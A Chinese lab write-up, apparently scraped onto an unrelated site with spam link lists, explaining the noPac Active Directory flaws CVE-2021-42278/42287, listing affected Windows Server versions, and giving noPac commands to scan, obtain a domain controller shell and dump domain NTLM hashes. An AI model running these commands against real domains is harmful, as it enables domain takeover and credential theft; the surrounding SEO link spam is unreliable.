当前位置: 首页 > news >正文

山东省机关建设网站软件开发网站建设科技有限公司

news 2025/11/7 6:45:36
山东省机关建设网站,软件开发网站建设科技有限公司,wordpress免登录查看,大站wordpress漏洞介绍2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。CVE-2021-42278:是一个安全绕过漏洞,允许通过修改机器…

漏洞介绍

2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。

CVE-2021-42278:是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充域控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证域内机器账户中是否有$,导致机器账户可以被假冒。

CVE-2021-42287:是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒域控制器,使密钥分发中心KDC创建高权限票据。其配合 CVE-2021-42278 使用,创建与域控机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self 申请TGS Ticket,接着域控在 TGS_REP 阶段,这个账户不存在的时候,DC会使用自己的密钥加密 TGS Ticket ,提供一个属于该账户的 PAC,然后我们就得到了一个高权限ST。

漏洞利用条件:

  • 已知域控ip

  • 已知域普通账号密码信息

影响范围

漏洞影响版本

CVE-2021-42287:

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows Server 2012

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows Server, version 2004 (Server Core installation)

  • Windows Server 2022 (Server Core installation)

  • Windows Server 2022

CVE-2021-42278:

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows Server, version 2004 (Server Core installation)

  • Windows Server 2022 (Server Core installation)

  • Windows Server 2022

漏洞复现

环境:

  • win2016(192.168.10.2) 域控

  • win7(192.168.10.5),yuwin7 域普通用户

假设获取了域内普通用户yuwin7的账号密码,yuwin7 / yuwin7.com

工具:https://github.com/Ridter/noPac

  1. 漏洞检测

python scanner.py -use-ldap test.lab/yuwin7:yuwin7.com -dc-ip 192.168.10.2

如下,说明存在漏洞

  1. 直接获取域控shell

python noPac.py  -use-ldap test.lab/yuwin7:yuwin7.com -dc-ip 192.168.10.2 -shell

  1. 导出域内哈希

python noPac.py  -use-ldap test.lab/yuwin7:yuwin7.com -dc-ip 192.168.10.2 -dump -just-dc-ntlm
http://www.yayakq.cn/news/789429/

相关文章:

  • 成都网站制作公司科蓝架设网站是自己架设服务器还是租服务器
  • 上海建设监理协会网站深圳展厅设计企业展厅
  • 网站浏览器兼容性问题吗wordpress设置禁止蜘蛛抓取
  • 怎样做网站关键词优化网推方案
  • 做网站前台和后台是什么手机上可以制作图片的软件
  • 品牌建设方式有哪些?陕西seo经理
  • 电商网站建设考试上海公共招聘网下载
  • 老鹰主机做的网站深圳做营销网站公司
  • 建网站软件下载建立网站策划书
  • 百度网站建设公司哪家好杭州有没有专业做网站的公司
  • 在线学习建设网站京东商城在线网上购物
  • 为什么建设的网站有时候访问慢菲律宾做网站好吗
  • 做网站 服务器格尔木有做网站的吗
  • 简单电子商务网站建设研发一个app费用
  • 做设计兼职的网站有哪些建站排名
  • 深圳公明网站建设公司做任务兼职赚钱的网站
  • 北京企业网站制作网络维护员
  • 乐达网站建设wordpress知更鸟博客主题
  • 如何开网站详细步骤图什么浏览器好用可以看任何网站
  • 建水网站建设seo优化系统哪家好
  • 阿里云网站备案要多久人力资源管理咨询公司
  • 网站制作设计方案徐州模板自助建站
  • 网站搭建心得体会网站权重什么意思
  • 网站建设及服务合同书手机网站开发c 教程
  • 免费自己做网站手机软件wordpress 登陆密码
  • 贵阳招聘网站建设秦皇岛正在建设的医院
  • 辽阳市网站建设图书类网站开发的背景
  • 重庆装修公司网站建设网站建设电脑维修数据恢复
  • 服饰技术支持 东莞网站建设软文是什么东西
  • 网站关键词快速优化网络推广模板网站